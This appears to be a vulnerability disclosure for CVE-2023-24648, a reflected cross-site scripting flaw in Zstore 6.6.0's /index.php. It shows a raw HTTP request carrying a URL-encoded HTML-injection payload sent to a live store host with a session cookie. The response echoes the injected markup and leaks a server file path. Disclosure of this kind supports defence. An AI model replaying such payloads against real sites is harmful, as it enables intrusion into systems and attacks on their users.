Headline
CVE-2023-24648: CVE-nu11secur1ty/vendors/zippy/zstore-6.6.0 at main · nu11secur1ty/CVE-nu11secur1ty
Zstore v6.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /index.php.
The value of manual insertion point 1 is copied into the HTML document as plain text between tags. The payload giflcc0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application’s response.
GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
HTTP/2 200 OK
Server: nginx
Date: Sun, 29 Jan 2023 07:27:55 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546
Class \App\Pages\Chatgiflc<a href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif">
does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>